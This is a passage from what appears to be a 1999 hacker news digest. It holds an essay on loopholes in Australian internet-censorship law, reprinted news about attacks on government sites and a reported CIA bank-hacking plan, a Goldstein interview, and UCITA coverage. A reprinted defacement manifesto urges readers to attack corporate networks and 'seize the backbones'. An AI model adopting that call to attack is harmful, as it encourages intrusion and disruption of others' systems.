FTP sites that contained lots of information. The way most people got around this restriction/limitation was using a service called ftp-by-email. To use it, you'd send an email to a certain address containing a sequence of standard ftp commands, as follows: From: 2600 Webmaster (webmaster@2600.org.au) To: FTP-By-Email (ftpmail@ftp.sunet.se) open mirror.aarnet.edu.au cd pub/linux/kernel cd v2.2 binary get README quit Following the receipt of this email, any files you had requested with a "get" command would be emailed back to you. A rundown of how this (still) works can be found here. Now, referring to the legislation, we find the following definition of "Internet content": Internet content means information that: (a) is kept on a data storage device; and (b) is accessed, or available for access, using an Internet carriage service; but does not include: (c) ordinary electronic mail; or (d) information that is transmitted in the form of a broadcasting service. and of "ordinary electronic mail": ordinary electronic mail does not include a posting to a newsgroup. Are you thinking what I'm thinking? Assuming the content is not accessible to the public by any means other than point-to-point, user-requested email, you could be very well within the law to offer content that is otherwise banned in any other forum. Flood the ABA with legitimate, appropriate complaints I'll start describing this means of evasion by displaying Clause 26. Take particular note of Subclause 26(2b): 26 Investigation of complaints by the ABA (1) The ABA must investigate a complaint under Division 1. (2) However, the ABA need not investigate the complaint if: (a) the ABA is satisfied that the complaint is: (i) frivolous; or (ii) vexatious; or (iii) not made in good faith; or (b) the ABA has reason to believe that the complaint was made for the purpose, or for purposes that include the purpose, of frustrating or undermining the effective administration of this Schedule. (3) The ABA must notify the complainant of the results of such an investigation. (4) The ABA may terminate such an investigation if it is of the opinion that it does not have sufficient information to conclude the investigation. Okay, so they thought people might flood them with frivolous complaints... Fair enough. But isn't it the case that every site that is not investigated by the ABA remains unregulated and therefore free? I'm sure you can put two and two together on this one. Use a "recognised alternative access prevention arrangement" I'll start this one by displaying two rather lengthy but important subclauses of the legislation, both of which describe possible means to evade content regulation by installing (but presumably not using) one of the currently-available end-user filtering pieces of software. Firstly Subclause 40(4-7): 40 Action to be taken in relation to a complaint about prohibited content hosted outside Australia (1) - (3) Recognised alternative access-prevention arrangements (4) An Internet service provider is not required to comply with a standard access-prevention notice in relation to a particular end-user if access by the end-user is subject to a recognised alternative access-prevention arrangement(as defined by subclause (5)) that is applicable to the end-user. (5) The ABA may, by written instrument, declare that a specified arrangement is a recognised alternative access-prevention arrangement for the purposes of the application of this Division to one or more specified end-users if the ABA is satisfied that the arrangement is likely to provide a reasonably effective means of preventing access by those end-users to prohibited content and potential prohibited content. Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901. (6) The following are examples of arrangements that could be declared to be recognised alternative access-prevention arrangements under subclause (5): (a) an arrangement that involves the use of regularly updated Internet content filtering software; (b) an arrangement that involves the use of a "family-friendly" filtered Internet carriage service. (7) An instrument under subclause (5) is a disallowable instrument for the purposes of section 46A of the Acts Interpretation Act 1901 and Subclause 60(3-8): 60 Matters that must be dealt with by industry codes and industry standards (1) - (2) Designated alternative access-prevention arrangements (3) An industry code or an industry standard may provide that an Internet service provider is not required to deal with Internet content notified under paragraph 40(1)(b) of this Schedule or clause 46 by taking steps to prevent particular end-users from accessing the content if access by the end-users is subject to an arrangement that is declared by the code or standard to be a designated alternative access-prevention arrangement for the purposes of the application of this clause to those end-users. (4) An industry code developed by a body or association must not declare that a specified arrangement is a designated alternative access-prevention arrangement for the purposes of the application of this clause to one or more specified end-users unless the body or association is satisfied that the arrangement is likely to provide a reasonably effective means of preventing access by those end-users to prohibited content and potential prohibited content. Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901. (5) An industry standard made by the ABA must not declare that a specified arrangement is a designated alternative access-prevention arrangement for the purposes of the application of this clause to one or more specified end-users unless the ABA is satisfied that the arrangement is likely to provide a reasonably effective means of preventing access by those end-users to prohibited content and potential prohibited content. Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901. (6) The following are examples of arrangements that could be declared to be designated alternative access-prevention arrangements: (a) an arrangement that involves the use of regularly updated Internet content filtering software; (b) an arrangement that involves the use of a "family-friendly" filtered Internet carriage service. (7) For the purposes of this Schedule, if an industry code: (a) deals to any extent with procedures to be followed by Internet service providers in dealing with Internet content notified under paragraph 40(1)(b) of this Schedule or clause 46; and (b) makes provision as mentioned in subclause (3); then: (c) the code is taken to deal with the matter set out in paragraph (2)(d); and (d) the code is taken to be consistent with subclause (2). (8) For the purposes of this Schedule, if an industry standard: (a) deals to any extent with procedures to be followed by Internet service providers in dealing with Internet content notified under paragraph 40(1)(b) of this Schedule or clause 46; and (b) makes provision as mentioned in subclause (3); then: (c) the standard is taken to deal with the matter set out in paragraph (2)(d); and (d) the standard is taken to be consistent with subclause (2). Now, if you've made it through all of that, you'll note a single key thing - that subject to appropriate industry codes and standards, it may be possible to have an unfiltered internet feed delivered to you if you have an end-user filtering system installed on your computer. The means of evasion here? Turn the filter off. Not exactly rocket science, is it? Mirror content so widely as to prevent effective enforcement of the legislation As with the two previous means of evasion, I will begin by displaying several pieces of the legislation. First up is Clause 36: 36 Anti-avoidance-special take-down notices If: (a) an interim take-down notice or a final take-down notice relating to particular Internet content is applicable to a particular Internet content host; and (b) the ABA is satisfied that the Internet content host is hosting in Australia, or is proposing to host in Australia, Internet content (the similar Internet content) that is the same as, or substantially similar to, the Internet content identified in the interim take-down notice or the final take-down notice, as the case may be; and (c) the ABA is satisfied that the similar Internet content is prohibited content or potential prohibited content; the ABA may give the Internet content host a written notice (a special take-down notice) directing the host not to host the similar Internet content at any time when the interim take-down notice or final take-down notice, as the case may be, is in force. Clause 36 appears to apply to mirrored information or, quite possibly, a website consisting of different layout/text but identical images. I'll now move onto Clauses 46 and 47: 46 Anti-avoidance-notified Internet content (1) If: (a) particular Internet content has been notified to Internet service providers as mentioned in Paragraph 40(1)(b) of this Schedule; and (b) the notification has not been withdrawn; and (c) the ABA is satisfied that Internet content (the similar Internet content) that is the same as, or substantially similar to, the first-mentioned Internet content is being hosted outside Australia; and (d) the ABA is satisfied that the similar Internet content is prohibited content or potential prohibited content; and (e) a code registered, or standard determined, under Part 5 of this Schedule deals with the matters referred to in subclause 60(2); the ABA must notify the similar Internet content to Internet service providers under the designated notification scheme set out in the code or standard, as the case may be. (2) If: (a) particular Internet content is notified to Internet service providers as mentioned in Paragraph 40(1)(b) of this Schedule; and (b) as a result of the application of subclause (1) to that content, the ABA notifies similar Internet content to Internet service providers in accordance with subclause (1); and (c) the notification of the first-mentioned content is withdrawn; the notification of the similar Internet content is taken to have been withdrawn. (3) If: (a) a notification of Internet content is withdrawn under subclause (2); and (b) a code registered, or standard determined, under Part 5 of this Schedule deals with the matters referred to in subclause 60(2); the ABA must notify the withdrawal to Internet service providers under the designated notification scheme set out in the code or standard, as the case may be. 47 Anti-avoidance-special access-prevention notice (1) If: (a) a standard access-prevention notice relating to particular Internet content is applicable to a particular Internet service provider; and (b) the ABA is satisfied that the Internet service provider is supplying an Internet carriage service that enables end-users to access Internet content (the similar Internet content) that is the same as, or substantially similar to, the Internet content identified in the standard-access prevention notice; and (c) the ABA is satisfied that the similar Internet content is prohibited content or potential prohibited content; the ABA may give the provider a written notice (special access-prevention notice) directing the provider to take all reasonable steps to prevent end-users from accessing the similar Internet content at any time when the standard access-prevention notice is in force. Note: The ABA may be taken to have given a notice under this clause-see clause 51. (2) For the purposes of subclause (1), in determining whether particular steps are reasonable, regard must be had to: (a) the technical and commercial feasibility of taking the steps; and (b) the matters set out in subsection 4(3). (3) Subclause (2) does not, by implication, limit the matters to which regard must be had. recognised alternative access-prevention arrangements (4) An Internet service provider is not required to comply with a special access-prevention notice in relation to a particular end-user if access by the end-user is subject to a recognised alternative access-prevention arrangement (as defined by subclause 40(5)) that is applicable to the end-user. The means of avoidance here would be purely and simply mirroring content so widely and in so many derivative (and possibly dissimilar) forms that even the process of generating take-down notices and notifying internet services providers would bog down the ABA and the OFLC. Commentary The intent of this legislation, as stated by the government, was to prevent children accessing "illegal and offensive" material on the Internet. More specifically, they made reference in various forums to pornographic material. My concern is not that responsible adults will be prevented from accessing this material, but that the legislation does not explicitly define what else might be regulated on the whim of a misguided Government minister or influential moral crusader within the ranks of the ABA or OFLC. One example of what might be banned is the BugTraq mailing list. This list contains "full disclosure" discussions of computer software bugs, including in some cases explicit instructions on how to break into computers. What might be easily overlooked in any such government review of this material is the fact that in most cases, such information is accompanied by further instructions on how to secure any vulnerable computers. Another oft-quoted example of how an overzealous filter might exclude important content is in the area of health. Breast cancer. Sexually-transmitted diseases. Contraception. If it's got any of the words filtered by Senator Alston's favoured filtering solution, iFilter (a number of them listed here), chances are your friendly neighbourhood ISP will be told to ban it long before you see it. Conclusion As you can see, there's a number of loopholes in the legislation that our government has pushed through parliament, and most of them allow a mildly intelligent citizen to quite legally evade any form of content regulation. Far from suggesting that this legislation should be heavier-handed than it already is in restricting people from accessing the information they want, I am suggesting that it should have been thrown out by the Paliament on the basis that it is fundamentally flawed and unenforceable. Instead, and without fear tactics or moralist rhetoric, the Government could have instituted a public education campaign informing parents about the need to restrict unsupervised/unfiltered access to the Internet with young children (5-13) and begin a dialogue about personal responsibility and self moderation with older ones (13 and up). As a young person that has grown up in the midst of computers and communication technologies, I believe this would have achieved a much more productive outcome. Feedback Given that this is a layperson's analysis of the legislation, I invite any and all comment from similarly concerned citizens, and in particular citizens familiar with legal matters that may be able to provide further insight. Please feel free to make comments to webmaster@2600.org.au. @HWA 08.0 Can the CIA break into banks? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Can CIA Break Into Banks? contributed by Weld Pond Last week Newsweek reported that the CIA was planning to electronically break into unnamed banks to get at Slobodan Milosevic's money. How realistic is this? Is it possible and if so what are the international implications? MSNBC takes a look at these questions and more. MSNBC http://www.msnbc.com:80/news/274526.asp Newsweek http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm MSNBC; Experts argue plan to raid Milosevic’s bank accounts would do more harm than good By Bob Sullivan MSNBC May 28 — It sounded like a Tom Clancy spy novel. Newsweek reported last week that the CIA was planning to tinker with international bank accounts full of Slobodan Milosevic’s money — just another way of getting under the Yugoslav president’s skin. Information warfare experts disagree about the feasibility of such a cyberattack. But there’s little disagreement the U.S. stands to lose much more than it might gain from firing the first volley in such an infomation war. In fact, some believe damage has already been done. THE NEWSWEEK STORY RAISED several issues: What international laws would govern a U.S.-backed attack on a bank in a third-party nation? Is such an attack feasible in the first place? What kind of retaliation might U.S. citizens, and their bank accounts, face? But most important, what does even the possibility of such an attack do to the integrity of international banking systems? The story on the cyberattack — fact, fiction or somewhere in between — could already have put the U.S. at risk, said Kawika Daguio, executive vice president of the Financial Information Protection Association. Banking systems hinge on public confidence. You put the money in; you’re confident you’ll be able to take the money out. If there’s any hint you might not be able to get at your money, you’d withdraw it. Any attack on the integrity of a banking system anywhere — particularly when retaliation seems like such an obvious possibility — chips away at public confidence. “It bothers me because we have had conversations with the defense and intelligence community. We thought this was off the table,” Daguio said. “We’ve had discussions with rather senior policy-makers. We thought they understood the importance of protecting public confidence in the payment system.” But retaliation by foreign agents might be just one source of insecurity for U.S. account holders. There’s another: If the government can and is willing to tinker with foreign accounts, what will stop it from tinkering with mine? Could U.S. agents hijack Milosevic’s money, allegedly stashed away in foreign banks? Yes and no. Experts agree that the CIA has had the know-how to control bank accounts for years, through old-fashioned non-cyber methods, such as coercing bank authorities, or even through legal methods such as freezing accounts. On the other hand, it’s not easy when the target knowns what’s coming. According to MSNBC analyst Bill Arkin, the international community, including UNSCOM, is still trying to get its hands on Saddam Hussein’s assets. And such real-world tactics are a far cry from the cyberwar image of a few CIA hackers sitting at a keyboard moving around money thanks to an Internet connection and some wits. There’s disagreement about how possible that might be. “The audits we have performed tell us [banks] are not invulnerable,” says a security expert identifying himself as Space Rogue. Rogue works at L0pht Heavy Industries, which hires out to hack corporate computer systems to test their vulnerability. “Banks have a little more security in place, but that security is still not at a level where it’s unbreakable.” While money systems aren’t connected to the public Internet, “sometimes they have a modem dangling off for remote access, or they use cryptography, but not correctly,” he said. Others suggest cracking a bank that holds Milosevic money — outside the more traditional methods — is nearly impossible. “I deal in probabilities, and I’ve never seen it,” said a man identifying himself as Louis Cipher, a principal investor in Infowar.com. Cipher is also in charge of security at what he says is the “sixth-largest brokerage in America.” He suggested very few individuals have the skills necessary to “tunnel” from an Internet connection through mainframe systems in banks — in fact, a team of specialists and inside information would be required. “You’d have to be an applications specialist to even navigate to a screen,” he said. “You’re talking well beyond the skills of hackers. It would have to be an insider working with Job Control Language sitting on the mainframe. The only one who would have that ability other than the U.S. government would be organized crime.” And Cipher is skeptical about the U.S. government’s ability to hire and hold the brightest minds in the security industry — since no government agency can match the lure of stock options offered by a high-tech firm. Still, even the possibility of the U.S. using a wired computer to move Milosevic’s money drew swift reaction from information warfare observers. Even hacker groups protested the notion, with a hacker calling himself “sixtoed” setting up a Web page in protest. The reason: Since the U.S. relies more on technology and information than any other nation, it stands to lose the most from such a cyberwar. “I am not one for an information arms race,” said Frank Cilluffo, senior analyst at the Center for Strategic and International Studies in Washington. “We will lose that race.... We’re a hell of a lot more susceptible to retaliation. The defensive implications outweigh the offensive implications.” Anyone can build up an information warfare capability, Cilluffo said. And it’s much more like guerrilla war than nuclear war — it’s easy for the enemy to hide, and there’s no real deterrent. Therefore, retaliation could be swift and indiscriminate. In addition, there is a general principle among security experts suggesting once a system’s security is compromised, it’s much easier to compromise a second time. So the U.S. could very well be paving the way for retribution. WHY NO DENIALS? Fear of such retaliation attempts, or even the perception of such retaliation attempts, drove Daguio to start calling his friends on the intelligence community to complain as soon as the Newsweek story hit. He has yet to receive the reassurance he was hoping for. “If it’s true or it’s just leaks, it’s bad to have the story out there,” Daguio said. “I have yet to have anyone tell me ‘Don’t worry, everything’s OK.’ ... If they haven’t done anything, the most appropriate thing to do is to come out and say they’re not doing it.” The CIA isn’t doing that; a spokesperson told MSNBC the agency couldn’t comment on its activities, but one source familiar with U.S. intelligence capabilities tells MSNBC to be “very skeptical” of the Newsweek story. Meanwhile, opening the Pandora’s box of cyberwar would lead to a series of yet-to-be answered questions. International law isn’t ready to handle such conflicts, says Cilluffo — so if the U.S. broke into a bank in Cyprus, what laws would govern that act? And could the compromised bank sue the U.S. government? “What are the rules of engagement here?” Cilluffo asked. “What is game, what is not game? This may be a harbinger of how we prosecute and wage war in the future.” @HWA 09.0 Emmanuel Goldstein Interview ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by cult_hero Adam Peneberg of Forbes writes a good long article after interviewing the editor of 2600 and the on air personality of "Off the Hook", Emmanuel Goldstein. Forbes http://www.forbes.com/penenberg/ RECENTLY, I met with Emmanuel Goldstein, publisher of the hacker zine 2600, at the New York City radio station WBAI. 2600, a slender volume containing articles about hacking, phone phreaking and tips for pirating videogames, has been around since 1984. Goldstein, a mainstay in the hacker world since he was a teenager, has hosted "Off the Hook," a weekly radio program, for more than ten years. When I asked Goldstein, whose real name is Eric Corley, which name he preferred, his response was, "Call me whatever you want, but the reason I changed it is because I didn't like Eric Corley. The name Emmanuel Goldstein, which comes from a character in Orwell's 1984, suits me much better--and many more people know me as Emmanuel." Goldstein, 39, long, scraggly hair streaked with gray poking out from under a 2600 baseball cap, was enmeshed in hacker culture long before there was an information superhighway. In 1983 he broke into computer systems at NASA, Coca-Cola, Raytheon and the Executive Office of the President of the United States. How was he able to get in? They were all using the same E-mail system, and Goldstein discovered that if he typed the letter "A," he could get the default password, which would allow him to gain access to the system. He then used these companies' mail systems to send E-mail to other hackers. Initially, he was charged with a whopping ten counts of wire fraud, each with a possible sentence of five years. This was the first time, he says, he experienced the government hyping the threat of computer crime. "I freely admitted what I did: It was an offense, but not a crime," Goldstein says. "I showed them what was wrong with their system: "'Don't use the letter 'A' for your default password,'" I told them. "They gave me probation for a year and I had to pay $200 for computer time. Then they let me go." These days, Goldstein spends most of his time working on behalf of his friend, Kevin Mitnick, the hacker poster boy who has been in prison for more than four years for illegally copying and hoarding proprietary software. Goldstein helps run two web sites dedicated to the cause, and is in the process of filming a documentary about Mitnick. "There is a lot of fear and paranoia about hackers, and it's not getting any better," he says. "The government needs a threat in order to justify its existence, and we are a convenient scapegoat, since most people really don't understand what we do. They claim that hackers do this and do that, they spread viruses and wreak havoc and destroy systems, and this is hard to dispel." For instance, President Clinton, who has proposed earmarking some $1.5 billion to fight cyberterror threats, said in a January speech at the National Academy of Sciences: "We already are seeing the first wave of deliberate cyber attacks--hackers break into government and business computers, stealing and destroying information, raiding bank accounts, running up credit card charges, extorting money by threats to unleash powerful computer viruses." It sounds like Clinton may have seen too many Keanu Reeve's flicks. Most companies that are hacked suffer web site graffiti. This means the victim company is forced to spend money to improve its security. Embarrassing? Certainly. A threat to business? Hardly, and why was the company's security so lax in the first place? While it is true that the Pentagon is hacked nearly every hour, that doesn't mean these teenagers (and that's who most of the hackers who go after "big game" like American military sites are) actually come away with anything. And the part about hackers extorting money by threatening to release nasty computer viruses sounds like it could have written by Stephen Glass, the former associate editor of The New Republic, who was busted for fabricating stories. Yet, each time the hacker menace is blown out of proportion means the cause of the problem is not addressed. Law enforcement can either go after the estimated one million hackers out there in cyberspace, most of them being "script kiddies" possessing basic skills at best, or it could insist that companies that release buggy software chock full of security holes take responsibility for the many holes in their products. If you bought a car that could be hijacked with off-the-shelf keys made available over the Internet, you might be tempted to sue the automaker for not doing more to secure the vehicle. Yet, since software companies don't technically sell their products, they "lease" them, they are not liable. If they were, they wouldn't release products that could be so easily penetrated by hackers. But companies like Microsoft have lobbyists. Hackers don't. So don't expect Congress to do much. Goldstein and Mitnick, who to this day is listed as a staff writer on 2600's masthead, became friends in 1989, after Kevin Mitnick's first go around in solitary confinement. (The court, without proof, was afraid that Mitnick could somehow whistle into a telephone and launch nuclear missiles.) While Mitnick, who says he was devastated by his eight months held in a cell no larger than a bathroom, went on the lam from the FBI in the early 1990s, afraid he would be put back in solitary, he called Goldstein almost everyday. "The day Kevin was arrested, I'd just missed a phone call from him," Goldstein says. "I was sad he hadn't followed my advice to leave the country. I knew what they would do to him." In the coming months, Takedown, a film based on the book by New York Times reporter John Markoff and Tsutomu Shimomura that details the capture of Kevin Mitnick, is scheduled to come out. Goldstein was able to gain an advance copy of the screenplay and complained bitterly over the evil way Mitnick was portrayed. After Goldstein led a protest outside of Miramax's corporate headquarters, the company made changes to the script. "It's still crap," he says, "but its more well-rounded crap." Does Goldstein, who freely admits his hacking skills are modest at best, have any pearls of wisdom to offer about hacking? "The people I hang out with know far more about technology than I do. When dealing with hackers, he cautions, "always assume you're being lied to." @HWA 10.0 DOD Unplugs From Net as Another Gov Site Gets Hit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by info-warrior In a move spokespeople are calling "proactive" (yeah, right) the Department of Defense has announced that it will be pulling its systems off the net to upgrade security and install a firewall. (About damn time.) The White House has also issued a stern warning to would be crackers saying "You will be caught". Interesting quote from the Washington Post "Securing government Web sites against attack is difficult because the sites are designed for open access." What makes them any more difficult to secure or more open than a corporate web site? C|Net http://www.news.com/News/Item/0,4,37257,00.html?owv ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2268574,00.html?chkpt=hpqs014 Washington Post http://www.washingtonpost.com/wp-srv/national/daily/june99/hackers02.htm And the War Continues The latest victim is Brookhaven National Labs. The main web page for the site was defaced late last night by the "Posse". They at least left an interesting message. HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html FBI Crackdown nets 20+ Script Kiddies The Posse would like to take this opportunity to personally thank the script kiddies who keep throwing themselves at the federal government like insects to a buglight. While you have been keeping the FBI (Federal Bureau Of Instigation) and SS (Secret Cervix) busy tracking down 14 year old hacker hopefuls; we have spent our time burrowing ourselves deep within Corporate America. Ecosystems do not grow without antagonists. The internet (like it or not) has become a virtual ecosystem that would wither and die were it not for the intervention of hackers. Corporate America has entered this ecosystem like a viral fungus, growing ugly clusters of .com decay, spreading misinformation like wildfire and causing the natural predators to be removed from the ecosystem in which they provide a necessary function. Corporate America must be removed. It's us or them. Take a look at the concrete wastelands that Corporate America has built upon the earth outside your windows. Beneath that concrete there is soil wasted, soil that breeds life. They are trying to do the same thing to the internet. Go outside and try to breathe for just a moment... That stale thickness in the air that Threatens to choke you is the poison spewing from their smokestacks... Did you just cough? The phlegm in your throat are their poisons and do you charge them rent ? Did you charge them storage fees for acting as a receptacle for their toxic waste? They are destroying the world we built to escape the one they have already destroyed! Corporate America will trade 10 years (minimum) of your life in exchange for another $10 in profits. Their poisons, their stifling concrete morgues, their so called "progress"... They never knew the rules, they followed you here to stalk you... To bilk you for $10 they came here because you did. Then when you got in the way of their "progress" they fabricated losses in order to gain FBI attention. They abuse the system and steal your freedoms. Do not blame the FBI, they are playing by the rules... Do not blame the SS, they are playing by the rules... BLAME CORPORATE AMERICA BLAME THE GOVERNMENT BUT QUIT ATTACKING THE FBI AND SECRET SERVICE! YOU ARE PLAYING BY THEIR RULES WHEN YOU DO THIS! A COMPUTER CRIMINAL IS ACCEPTABLE TO SOCIETY THAT IS WHY WE HAVE COMPUTER CRIME LAWS AND PRISONS! ATTACK CORPORATE AMERICA... THE RACE BEGINS... NO MORE .COM'S ON THE INTERNET BY Y2K. SEIZE THE BACKBONES! THEY BELONG To YOU! CONTROL THE MEDIUMS BY WHICH THESE CORPORATE IDIOTS DO BUSINESS. H4ppy Th4nksg1v1ng Turk3yz, The P0sse. Greets out 2: Gary Dell'Abate, Scott Charney, Gale Thackeray, Terry Atchley, Kurt Von Brauch, Don Delaney, Chris Goggans Tsutomu Shimomoura, Justin Tanner Peterson, John Markhoff, John Perry Barlow, Netta Gilboa, Corey Braun, Peter "HFG" Shipley, Berferd, Dan Farmer, Wietse Venema, Dale Drew, Joshua Quittner, Stephanie Hanna, Joe Cuervo and Jim Beam. Kick in the colostomy bag out 2: gH, Eric Burns, mosthated, mindphasr, Kevin Mitnick, Kevin Poulsen, Phiber Optik, John Draper, Emmanuel Goldstein, SOB!, 9X, EL8, #pascal, team spl0it, attrition.org, Kit Knox, b4b0, AntiOnline, HackerNews.com, Zo0mer, mozy, m1crochip, in0de, #bolo, Red Knight, slack packet, Israeli Ghost, infam0us, f0rpaxe, HFX international, kimmy, Rosie O'Donell and all K-MART employees. C|Net; White House threatens to punish hackers By Reuters Special to CNET News.com June 1, 1999, 3:35 p.m. PT WASHINGTON--Annoyed by a recent wave of attacks against official U.S. government Web sites, the White House today warned hackers who target federal Web sites that they will be caught and punished. "There's a government-wide effort to make sure that our computer systems remain secure," White House Press Secretary Joe Lockhart said in a briefing. "For those who think that this is some sort of sport, I think [it will be] less fun when the authorities do catch up with them...and these people are prosecuted," he said. To protect against attacks that in recent days and weeks have disabled sites run by the Energy Department, the FBI, the Senate, the Interior Department, and the White House, the Defense Department said it planned to shut down its Web site for a short time today, said Ken Bacon, the Pentagon's chief spokesman. "This is much more protective than reactive," Bacon said. "It's looking to the future to prevent the types of problems that the other agencies" have experienced in recent weeks on their sites, he said. Attacking U.S. government Web sites is becoming an increasingly popular tool of people angry with the Clinton administration and its agencies. Last week hackers responded to a six-state FBI sweep of about 20 suspected hackers by attacking several government Internet locations, forcing the FBI, the Interior Department, and the U.S. Senate to temporarily shut down their Web sites. After NATO jets hit the Chinese Embassy in Belgrade in May, hackers from China attacked a handful of U.S. government sites, including one maintained by the Energy Department. In an unrelated incident, the official White House site was shut down briefly because of an attempt to tamper with it by unidentified hackers, officials said. In recent years the Justice Department's site was shut down once by hackers who put Nazi swastikas on its home page, and hackers forced the CIA to shut down its site after they changed the name from "Central Intelligence Agency" to "Central Stupidity Agency." With many U.S. government sites under attack, computer security experts are bracing for what could be a month full of additional Internet hacking incidents. Supporters of Kevin Mitnick, a hacker jailed in Los Angeles since February 1995, will demonstrate in 14 U.S. cities Friday, seeking his release to a halfway house and an easy probation when he is sentenced on June 14. Mitnick, 35, pleaded guilty on March 26 to seven counts of wire fraud, computer fraud, and illegal interception of a wire communication. Federal officials said he impersonated an employee of Finland-based Nokia Mobile Phones to steal software worth $240,000. He also stole software from Motorola, Novell, Fujitsu Network Transmission Systems, and Sun Microsystems, federal officials said. Supporters of Mitnick say the four years Mitnick has spent in jail awaiting trial is a harsher term than for many people convicted of violent crimes like robbery and assault. Their protest Friday will be seeking a more lenient sentence. The U.S. attorney for the Central District of California said Mitnick will be sentenced to 46 months in prison on June 14 as part of his plea bargain agreement with the government. Mitnick, whose exploits as a hacker inspired an upcoming Hollywood movie, also will be obliged to pay the victims of his crimes from any profits he makes from books or movies about his life, a spokesman for the U.S. attorney's office said. While hacking incidents may not be part of Friday's nationwide protest, there may be a surge in attacks across the Internet if Mitnick's sentence is perceived as too stiff, said John Vranesevich, the founder and director of AntiOnline. "Hackers attack when they're mad about something. The demonstration Friday will be an attempt to educate," said Vranesevich. "However, if Kevin Mitnick is put in jail, there very well could be more attacks after that." Still, other experts said Internet sites should upgrade their security against possible attack before Friday. "Given the timing, it probably would be a good idea to be more on guard than usual," said Jevon Jaconi, the district attorney of Kewaunee County, Wisconsin, and an expert in the developing field of cyberspace law. Between 70 percent and 80 percent of all Internet hacking attacks come on systems that have not updated their security codes, routinely sent by computer manufacturers and network administrators, Jaconi said. The best way to prevent hacking attacks in the future is to heed those security warnings and implement the needed changes, he said. Washington Post; Online Security Is Pentagon's Latest Battle By John Schwartz Washington Post Staff Writer Wednesday, June 2, 1999; Page A2 The Department of Defense announced yesterday that it was briefly pulling its computers off the Internet to upgrade security by installing hardier "firewall" protection between computer systems that are accessible to the outside world and those that should not be. Noting the recent spate of hacker attacks on government Web sites, Pentagon spokesman Kenneth Bacon said the upgrade is part of a long-term computer security effort: "This is much more protective than reactive." In fact, the Defense Department is engaged in long-term planning that could completely move its unclassified networks off the Internet and on to a proprietary system. The GNIE project (Global Network Information Enterprise, pronounced "genie") will unveil this major proposal this summer, said DOD spokeswoman Susan Hansen. "A lot of systems over the years have been patched together," she said, and "of course, you're only as strong as your weakest link." Skirmishes between federal law enforcement officials and computer intruders have been intensifying in recent weeks. Hackers angered by about 20 recent FBI raids on suspected members of the loose-knit computer underground have launched a variety of attacks on Web sites maintained by the FBI, the Senate, the Interior Department and the White House. "For those who do this for whatever kind of sport it provides them, they'll be found, and they'll be prosecuted," White House press secretary Joe Lockhart said yesterday. Securing government Web sites against attack is difficult because the sites are designed for open access; that's why security-conscious computer managers separate Web computer systems from those that contain critical internal information. In the case of the FBI computer intrusions, for example, "these are not the internal systems that contain classified or top-secret information," said Justice Department spokeswoman Carole Florman. "Those systems have not been at risk, and they have not been compromised." Instead, she said, the attacked sites are "the FBI's vehicle for communicating with the public. . . . What they are really doing is denying access to the American public to the information available on that Web site." FBI agents across the country have been focusing on a gang that calls itself "Global Hell." The agents appear to be going after leading members of the group and some peripheral figures, hoping to find bigger players, said John Vranesevich, founder of antionline.com, a Web site that tracks hacker activity. Vranesevich called the hacker response "a tantrum," saying that "many of them are now realizing for the first time that everything they've been doing for the past few months [has] been watched." Those targeted by the raids say that the agents are casting a very broad net. Paul Maidman, 18, was asleep when FBI agents entered his apartment. The New Jersey teen's mother had already left for work for the day when a half-dozen armed agents grabbed Maidman's computer and began hours of questioning. Noting that he has no relationship with Global Hell but that he has sat in on Internet chats where its members have congregated, Maidman said, "I'm not really counting on getting it [the computer] back any time soon." He added that he has shied away from computer mischief since he turned 18. Maidman said that while the experience with the government agents was intimidating, "they were actually really nice." When his 12-year-old sister woke up, "they made her waffles," he said. Experts in computer crime said the government reaction constitutes just the latest wave of law enforcement efforts to curtail computer mischief. "It's immensely foolish of the hacker underground to step up its assaults on law enforcement sites," said Michael Godwin, author of the book "Cyber Rights." "These two cultures regard each other with such deep antagonism and distrust that you might have to call in [veteran diplomat] Richard Holbrooke to sort it out," Godwin said. © Copyright 1999 The Washington Post Company @HWA 11.0 UCITA About to be Approved ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ryan.Russell The Uniform Computer Information Transactions Act is about to be approved. This draconian act will give vendors the right to repossess software by disabling it remotely (meaning you have to leave a port open on the firewall? Just imagine the DoS possibilities.); prevent the transfer of licenses from one party to another without vendor permission (Does this include my copy of LoadRunner for the Atari2600 that I sold for $5?); outlaw reverse engineering (Whoa, no more third party security analysis). This new law is being supported by such software giants as Microsoft, Adobe, and WinPro. The proposed legislation is set to go before the National Conference of Commissioners on Uniform State Laws in July. If this panel approves this measure it will then be sent to state legislations around the country. (Good way to bypass the feds.) InfoWorld http://www.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita.htm National Conference of Commissioners on Uniform State Laws http://www.2bguide.com/docs/040799pr.html InfoWorld; Licensing time bomb Software-law dispute explodes as enactment draws near By Jessica Davis Imagine the horror of walking into work one day to find your software vendor holding your company hostage by threatening to shut down your mission-critical systems unless you concede to its terms. Sounds illegal, right? Perhaps not. Although many IT professionals are unaware of it, that practice will become legally defensible if new legislation called the Uniform Computer Information Transactions Act, or UCITA, is approved. UCITA is a proposed law for applying consistent rules to computer software licenses across all 50 states. It would * give vendors the right to repossess software by disabling it remotely; * make the terms of shrink-wrapped licenses more enforceable; * prevent the transfer of licenses from one party to another without vendor permission; * allow vendors to disclaim warrantees; and * outlaw reverse engineering. Proponents of the law, primarily software vendors, say it is time for a uniform law that applies directly to software licenses. Critics, including technology consumer groups such as the Society of Information Managers (SIM), say UCITA is fatally flawed and should be killed. Other trade organizations representing the motion picture industry, newspapers, magazines, and the music recording industry, have joined SIM in opposing UCITA. In July, a state attorney organization known as the National Conference of Commissioners on Uniform State Laws (NCCUSL) will meet in Denver to approve UCITA. If the organization gives the proposal a green light, a few state legislatures are likely to rubber-stamp it by the end of the year and UCITA will become law, according to UCITA experts. This fast time table has opponents up in arms. Although SIM is in favor of a law to govern software licensing, it says it believes UCITA cannot be fixed. "This law would significantly increase the level of the burden on the IT procurement function and significantly increase the cost of procurement -- both in staff costs and out-of-pocket 